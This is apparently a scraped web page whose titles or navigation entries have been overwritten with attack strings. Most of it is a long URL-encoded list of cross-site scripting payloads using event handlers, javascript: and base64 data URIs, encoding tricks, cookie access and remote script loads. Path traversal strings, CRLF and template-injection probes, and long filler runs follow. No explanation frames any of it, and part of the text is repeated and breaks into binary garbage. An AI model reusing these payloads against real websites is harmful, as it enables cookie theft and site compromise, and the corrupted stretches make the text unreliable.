67%256C%2565%252E%2563%256F%256D%22-XSS--A---A-HREF=%22http:--1113982867-%22-XSS--A---A-HREF=%22http:--0x42.0x0000066.0x7.0x93-%22-XSS--A---A-HREF=%22http:--0102.0146.0007.00000223-%22-XSS--A---A-HREF=%22htt-p:--6-6.000146.0x7.147-%22-XSS--A---iframe-%2500-src=%22 javascript:prompt(1) %22%2500---svg--style-%7Bfont-family:'-iframe-onload=confirm(1)-'--input-onmouseover=%22javaSCRIPT:confirm(1)%22--sVg--scRipt-%2500-alert(1)-%7BOpera%7D--img-src=%60%2500%60-onerror=this.onerror=confirm(1)---form--isindex-formaction=%22javascript:confirm(1)%22--img-src=%60%2500%60 -onerror=alert(1) --script- -src='https:--dl.dropbox.com-u-13018058-js.js'-- ---script---ScRipT-5-03-9-3=-prompt(1)--ScRipT-giveanswerhere=%3F--iframe-src=%22data:text-html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==%22---script--%2500---%2500-alert(1)-%2500---script--%2500--&%2334;&%2362;-h1-onmouseover='%5Cu0061lert(1)'-%2500--iframe-src=%22data:text-html,-svg-&%23111;&%23110;load=alert(1)-%22---meta-content=%22 -1- ;-JAVASCRIPT:-alert(1)%22-http-equiv=%22refresh%22----svg--script-xlink:href=data:,window.open('https:--www.google.com-')---script--svg--script-x:href='https:--dl.dropbox.com-u-13018058-js.js'-%7BOpera%7D--meta-http-equiv=%22refresh%22-content=%220;url=javascript:confirm(1)%22---iframe-src=javascript:alert(document.location)---form--a-href=%22javascript:%5Cu0061lert&%23x28;1&%23x29;%22-X---script--img-%2500-src=%22worksinchrome:prompt&%23x28;1&%23x29;%22-%2500-onerror='eval(src)'---img-&%2309;&%2310;&%2311;-src=%60~%60-onerror=prompt(1)---form--iframe-&%2309;&%2310;&%2311;-src=%22javascript&%2358;alert(1)%22&%2311;&%2310;&%2309;;---a-href=%22data:application-x-x509-user-cert; base64 ,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%22&%2309;&%2310;&%2311;-X--a-http:--www.google-script-.com-alert(document.location)--script--a&%2332;href&%2361;&%2391;&%2300;&%2393;%22&%2300;-onmouseover=prompt&%2340;1&%2341;&%2347;&%2347;%22-XYZ--a--img-src=@&%2332;&%2313;-onerror-=-prompt('&%2349;')--style-onload=prompt&%2340;'&%2388;&%2383;&%2383;'&%2341;--script-%5E__%5E-alert(String.fromCharCode(49))--script-%5E__%5E---style-&%2332;--script-&%2332;-:-(---alert(document.location)----script-&%2332;-:-(-&%2300;--form--input-type&%2361;%22date%22-onfocus=%22alert(1)%22---form--textarea-&%2313;-onkeyup='%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074&%23x28;1&%23x29;'---script------confirm('%5CuFF41%5CuFF4C%5CuFF45%5CuFF52%5CuFF54%5Cu1455%5CuFF11%5Cu1450')----script-----iframe-srcdoc='<body-onload=prompt(1)>'---a-href=%22javascript:void(0)%22-onmouseover= javascript:alert(1) -X--a---script-~~~-alert(0%250)--script-~~~---style-onload=<!--&%2309;>&%2310;alert&%2310;(1)------style-----span-%252F-onmousemove='alert(1)'-SPAN--img-src='http:--i.imgur.com-P8mL8.jpg'-onmouseover= prompt(1)-&%2334;&%2362;-svg--style-%7B-o-link-source:'-body-onload=confirm(1)-'-&%2313;-blink-&%2313;-onmouseover=pr&%23x6F;mp&%23116;(1)-OnMouseOver-%7BFirefox-&-Opera%7D--marquee-onstart='javascript:alert&%23x28;1&%23x29;'-%5E__%5E--div-style=%22width:expression(confirm(1))%22-X--div--%7BIE7%7D--iframe-%2500--src=javaSCRIPT:alert(1)----form-action=javascript&%23x3A;alert(document.cookie)--input-type='submit'-----iframe-src--iframe-src=%22-iframe-src=@%22-onload=prompt(1)--iframe-src-----%7C%5C%5C--script---%7C%5C%5C-src='https:--dl.dropbox.com-u-13018058-js.js'----%7C%5C%5C---script---%7C%5C%5C---font---svg--style-%7Bsrc&%23x3A;'-style-onload=this.onload=confirm(1)-'--font----style---a-href=%22javascript:&%2313;-javascript:prompt(1)%22--input-type=%22X%22----plaintext%5C---%7C%5C--plaintext-onmouseover=prompt(1)---svg-''-svg--script-'AQuickBrownFoxJumpsOverTheLazyDog'-alert&%23x28;1&%23x29;-%7BOpera%7D--a-href=%22javascript:%5Cu0061&%23x6C;&%23101%2572t(1)%22--button---div-onmouseover='alert(1)'-DIV--div---iframe-style=%22position:absolute;top:0;left:0;width:100%25;height:100%25%22-onmouseover=%22prompt(1)%22---a-href=%22jAvAsCrIpT:alert(1)%22-X--a---embed-src=%22http:--corkami.googlecode.com-svn-!svn-bc-480-trunk-misc-pdf-helloworld_js_X.pdf%22---object-data=%22http:--corkami.googlecode.com-svn-!svn-bc-480-trunk-misc-pdf-helloworld_js_X.pdf%22---var-onmouseover=%22prompt(1)%22-On-Mouse-Over--var---a-href=javascript:alert(document.cookie)-Click-Here--a---img-src=%22-%22-==%22-title=%22onerror='prompt(1)'%22---%25-!--'%25--script-alert(1);--script------script-src=%22data:text-javascript,alert(1)%22---script---iframe-src-%5C-%5C-onload-=-prompt(1)--iframe-onreadystatechange=alert(1)--svg-onload=alert(1)--input-value=---iframe-src=javascript:confirm(1)--input-type=%22text%22-value=%60%60--div-onmouseover='alert(1)'-X--div--http:--www.-script-alert(1)--script-.com--iframe-src=j a v a s c r i p t :a l e r t 28 1 %2529---iframe---svg--script-%3F-alert(1)--iframe-src=j a v a s c r i p t :a l e r t %2528 1 %2529---iframe---img-src=%60xx:xx%60onerror=alert(1)---object-type=%22text-x-scriptlet%22-data=%22http:--jsfiddle.net-XLE63--%22---object---meta-http-equiv=%22refresh%22-content=%220;javascript:alert(1)%22----math--a-xlink:href=%22--jsfiddle.net-t846h-%22-click--embed-code=%22http:--businessinfo.co.uk-labs-xss-xss.swf%22-allowscriptaccess=always---svg-contentScriptType=text-vbs--script-MsgBox-1--a-href=%22data:text-html;base64_,-svg-onload=%5Cu0061&%23x6C;&%23101%2572t(1)-%22-X--a--iframe-onreadystatechange=%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074('%5Cu0061')-worksinIE---script-'%5Cu0061'-;-%5Cu0074%5Cu0068%5Cu0072%5Cu006F%5Cu0077--%5Cu0074%5Cu0068%5Cu0069%5Cu0073.-%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074('%5Cu0061')--script-U---script-src=%22data:text%252Fj%5Cu0061v%5Cu0061script,%5Cu0061lert('%5Cu0061')%22---script-a=%5Cu0061-&--=%252F--script-src=data:text-j%5Cu0061v%5Cu0061&%23115&%2399&%23114&%23105&%23112&%23116,%5Cu0061%256C%2565%2572%2574(-XSS-)---script--object-data=javascript:%5Cu0061&%23x6C;&%23101%2572t(1)---script-----1----alert(1)--script---body-onload=<!-->&%2310alert(1)---script-itworksinallbrowsers---script--alert(1)--script--img-src-%3Fitworksonchrome%3F%5C-onerror-=-alert(1)--svg--script--- confirm(1);--script---svg---svg--script-onlypossibleinopera:-)--alert(1)--a-aa-aaa-aaaa-aaaaa-aaaaaa-aaaaaaa-aaaaaaaa-aaaaaaaaa-aaaaaaaaaa-href=j&%2397v&%2397script&%23x3A;&%2397lert(1)-ClickMe--script-x--alert(1)---script-1=2--div-onmouseover='alert(1)'--style=%22x:%22-----%60-img-src=%60-onerror=alert(1)----!---script-src=&%23100&%2397&%23116&%2397:text-&%23x6a&%23x61&%23x76&%23x61&%23x73&%23x63&%23x72&%23x69&%23x000070&%23x074,&%23x0061;&%23x06c;&%23x0065;&%23x00000072;&%23x00074;(1)---script---div-style=%22position:absolute;top:0;left:0;width:100%25;height:100%25%22-onmouseover=%22prompt(1)%22-onclick=%22alert(1)%22-x--button--%22--img-src=x-onerror=window.open('https:--www.google.com-');---form--button-formaction=javascript:alert(1)-CLICKME--math--a-xlink:href=%22--jsfiddle.net-t846h-%22-click--object-data=data:text-html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik----object---iframe-src=%22data:text-html,%253C%2573%2563%2572%2569%2570%2574%253E%2561%256C%2565%2572%2574%2528%2531%2529%253C%252F%2573%2563%2572%2569%2570%2574%253E%22---iframe---a-href=%22data:text-html;blabla,&%2360&%23115&%2399&%23114&%23105&%23112&%23116&%2332&%23115&%23114&%2399&%2361&%2334&%23104&%23116&%23116&%23112&%2358&%2347&%2347&%23115&%23116&%23101&%23114&%23110&%23101&%23102&%2397&%23109&%23105&%23108&%23121&%2346&%23110&%23101&%23116&%2347&%23102&%23111&%23111&%2346&%23106&%23115&%2334&%2362&%2360&%2347&%23115&%2399&%23114&%23105&%23112&%23116&%2362&%238203%22-Click-Me--a--%E2%80%98;-alert(1);-%E2%80%98)alert(1);----ScRiPt-alert(1)--sCriPt---IMG-SRC=jAVasCrIPt:alert(%E2%80%98XSS%E2%80%99)---IMG-SRC=%E2%80%9Djavascript:alert(%E2%80%98XSS%E2%80%99);%E2%80%9D---IMG-SRC=javascript:alert("XSS")---IMG-SRC=javascript:alert(%E2%80%98XSS%E2%80%99)---------img-src=xss-onerror=alert(1)---iframe-%2500-src=%22 javascript:prompt(1) %22%2500---svg--style-%7Bfont-family:'-iframe-onload=confirm(1)-'--input-onmouseover=%22javaSCRIPT:confirm(1)%22--sVg--scRipt-%2500-alert(1)-%7BOpera%7D--img-src=%60%2500%60-onerror=this.onerror=confirm(1)--form--isindex-formaction=%22javascript:confirm(1)%22--img-src=%60%2500%60 -onerror=alert(1) --script- -src='https:--dl.dropbox.com-u-13018058-js.js'-- ---script---ScRipT-5-03-9-3=-prompt(1)--ScRipT-giveanswerhere=%3F--iframe-src=%22data:text-html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==%22---script--%2500---%2500-alert(1)-%2500---script--%2500--&%2334;&%2362;-h1-onmouseover='%5Cu0061lert(1)'-%2500--iframe-src=%22data:text-html,-svg-&%23111;&%23110;load=alert(1)-%22---meta-content=%22 -1- ;-JAVASCRIPT:-alert(1)%22-http-equiv=%22refresh%22----svg--script-xlink:href=data:,window.open('https:--www.google.com-')---script--svg--script-x:href='https:--dl.dropbox.com-u-13018058-js.js'-%7BOpera%7D--meta-http-equiv=%22refresh%22-content=%220;url=javascript:confirm(1)%22---iframe-src=javascript:alert(document.location)---form--a-href=%22javascript:%5Cu0061lert&%23x28;1&%23x29;%22-X---script--img-%2500-src=%22worksinchrome:prompt&%23x28;1&%23x29;%22-%2500-onerror='eval(src)'---img-&%2309;&%2310;&%2311;-src=%60%60-onerror=prompt(1)---form--iframe-&%2309;&%2310;&%2311;-src=%22javascript&%2358;alert(1)%22&%2311;&%2310;&%2309;;---a-href=%22data:application-x-x509-user-cert; base64 ,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%22&%2309;&%2310;&%2311;-X--a-http:--www.google-script-.com-alert(document.location)--script--a&%2332;href&%2361;&%2391;&%2300;&%2393;%22&%2300;-onmouseover=prompt&%2340;1&%2341;&%2347;&%2347;%22-XYZ--a--img-src=@&%2332;&%2313;-onerror-=-prompt('&%2349;')--style-onload=prompt&%2340;'&%2388;&%2383;&%2383;'&%2341;--script-%5E__%5E-alert(String.fromCharCode(49))--script-%5E__%5E---style-&%2332;--script-&%2332;-:-(---alert(document.location)----script-&%2332;-:-(-&%2300;--form--input-type&%2361;%22date%22-onfocus=%22alert(1)%22---form--textarea-&%2313;-onkeyup='%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074&%23x28;1&%23x29;'---script------confirm('%5CuFF41%5CuFF4C%5CuFF45%5CuFF52%5CuFF54%5Cu1455%5CuFF11%5Cu1450')----script-----iframe-srcdoc='<body-onload=prompt(1)>'---a-href=%22javascript:void(0)%22-onmouseover= javascript:alert(1) -X--a---script-~~~-alert(0%250)--script-~~~---style-onload=<!--&%2309;>&%2310;alert&%2310;(1)------style-----span-%252F-onmousemove='alert(1)'-SPAN--img-src='http:--i.imgur.com-P8mL8.jpg'-onmouseover= prompt(1)-&%2334;&%2362;-svg--style-%7B-o-link-source:'-body-onload=confirm(1)-'-&%2313;-blink-&%2313;-onmouseover=pr&%23x6F;mp&%23116;(1)-OnMouseOver-%7BFirefox-&-Opera%7D--marquee-onstart='javascript:alert&%23x28;1&%23x29;'-%5E__%5E--div-style=%22width:expression(confirm(1))%22-X--div--%7BIE7%7D--iframe-%2500--src=javaSCRIPT:alert(1)----form-action=javascript&%23x3A;alert(document.cookie)--input-type='submit'-----iframe-src--iframe-src=%22-iframe-src=@%22-onload=prompt(1)--iframe-src-----%7C%5C%5C--script---%7C%5C%5C-src='https:--dl.dropbox.com-u-13018058-js.js'----%7C%5C%5C---script---%7C%5C%5C---font---svg--style-%7Bsrc&%23x3A;'-style-onload=this.onload=confirm(1)-'--font----style---a-href=%22javascript:&%2313;-javascript:prompt(1)%22--input-type=%22X%22----plaintext%5C---%7C%5C--plaintext-onmouseover=prompt(1)---svg-''-svg--script-'AQuickBrownFoxJumpsOverTheLazyDog'-alert&%23x28;1&%23x29;-%7BOpera%7D--a-href=%22javascript:%5Cu0061&%23x6C;&%23101%2572t(1)%22--button---div-onmouseover='alert(1)'-DIV--div---iframe-style=%22xg-p:absolute;top:0;left:0;width:100%25;height:100%25%22-onmouseover=%22prompt(1)%22---a-href=%22jAvAsCrIpT:alert(1)%22-X--a---embed-src=%22http:--corkami.googlecode.com-svn-!svn-bc-480-trunk-misc-pdf-helloworld_js_X.pdf%22---object-data=%22http:--corkami.googlecode.com-svn-!svn-bc-480-trunk-misc-pdf-helloworld_js_X.pdf%22---var-onmouseover=%22prompt(1)%22-On-Mouse-Over--var---a-href=javascript:alert(document.cookie)-Click-Here--a---img-src=%22-%22-==%22-title=%22onerror='prompt(1)'%22---%25-!--'%25--script-alert(1);--script------script-src=%22data:text-javascript,alert(1)%22---script---iframe-src-%5C-%5C-onload-=-prompt(1)--iframe-onreadystatechange=alert(1)--svg-onload=alert(1)--input-value=---iframe-src=javascript:confirm(1)--input-type=%22text%22-value=%60%60--div-onmouseover='alert(1)'-X--div--http:--www.-script-alert(1)--script-.com--iframe-src=j a v a s c r i p t :a l e r t 28 1 %2529---iframe---svg--script-%3F-alert(1)--iframe-src=j a v a s c r i p t :a l e r t %2528 1 %2529---iframe---img-src=%60xx:xx%60onerror=alert(1)---meta-http-equiv=%22refresh%22-content=%220;javascript:alert(1)%22----math--a-xlink:href=%22--jsfiddle.net-t846h-%22-click--embed-code=%22http:--businessinfo.co.uk-labs-xss-xss.swf%22-allowscriptaccess=always---svg-contentScriptType=text-vbs--script-MsgBox-1--a-href=%22data:text-html;base64,-svg-onload=%5Cu0061&%23x6C;&%23101%2572t(1)-%22-X--a--iframe-onreadystatechange=%5Cu00Gc%1B%05p%EF%BF%BD3%12%EF%BF%BDl%0FN%C6%AA%EF%BF%BD2%0FM%EF%BF%BD2100644-Home%22-'-%5C--textarea-&0%5C%22%5C'%C2%A5%22%C2%A5'u000)
• Please reload this page
• Home
• ..%2f..%2f..%2f..%2faaaaaaaaaaaaa
• Please reload this page
• 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
• Please reload this page
• aa
• Please reload this page
• Home2%22 '%0d%0a..%2f..%2f..%2f..%2f..%2f %5C
• Please reload this page
• Home2%22 '%0d%0a..%2f..%2f..%2f..%2f..%2f %5C textarea " ' {{ img src=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx%0d%0aa:a %5C%22}}&0%5C%22%5C'%C2%A5%22%C2%A5'u000_Footer img src=x onerror=alert(0)%0d%0aa:a " {{8*8}}
• Please reload this page